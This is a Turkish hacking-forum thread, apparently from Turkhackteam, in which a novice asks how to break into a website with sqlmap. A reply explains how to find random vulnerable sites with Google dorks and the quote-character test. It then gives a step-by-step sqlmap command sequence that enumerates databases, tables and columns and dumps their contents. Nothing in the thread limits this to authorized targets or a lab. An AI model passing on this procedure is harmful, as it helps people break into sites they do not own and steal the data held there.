Merhaba,Merhaba arkadaşlar kali linuxu yeni yükledim sqlmap ile bir siteye arama yapmak istiyorum. Formda çokca konu var fakat 0 dan basit şekilde anlatırsanız sevinirim.
Bildiğiniz sql açıklı bir site ve nasıl sızacağımı anlatır mısınız ? İyi günler.
Teşekkür ettim tam istediğim şekilde bi anlatım olmuş kısa ve öz iyi formlar .Merhabalar;
SQL açığı için eğer bir hedef siteniz var ise Acunetix, Zaproxy, Safe3, SkipFish gibi zafiyet tarayıcı programlar ile sql açığını keşfedebilir veya hedefiniz yoksa google de inurl:article.php?id= , inurl:news.php?id= gibi dorkları aratarak çıkan sitelerde url' deki id değerinin sonuna ' (tırnak) işareti koyarak tespit edebilirsiniz(örn:.php?id=2'). Eğer SQL açığı var ise site "SQL syntax;" veya sitedeki içeriklerin silinmesi gibi çeşitli hatalar vericektir.
SQLMAP Kullanımı;
Diyelim ki sql açığı olan bir site bulduk databaseyi nasıl çekicez? aşağıdaki basit sqlmap komutları ile sitenin databasesi çekilebilir;
sqlmap -u "http ://aciklisite.com/index.php?id=1" --dbs --batch
sqlmap -u "http ://aciklisite.com/index.php?id=1" -D db_adi --tables --batch
sqlmap -u "http ://aciklisite.com/index.php?id=1" -D db_adi -T tablo_adi --columns --batch
sqlmap -u "http ://aciklisite.com/index.php?id=1" -D db_adi -T tablo_adi -C kolon_adi/adlari --dump --batch
İyi Forumlar...
En iyi, açıklayıcı, öğretici cevabı kim verirse onu çözüldü olarak işaretler. AyrıcanMap dedim Havijle Vur dedim benimki demek açıklayıcı olmamış valla gülünecek tiplersiniz Ne Diyim
orda yazdığım üzere 0 bilgim var dedim siz bana gelip nmapten felan bahsediyorsunuz adam 0 bilgili insana anlatir gibi anlattiği için onu seçmekte oldukca mantıklı.nMap dedim Havijle Vur dedim benimki demek açıklayıcı olmamış valla gülünecek tiplersiniz Ne Diyim
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.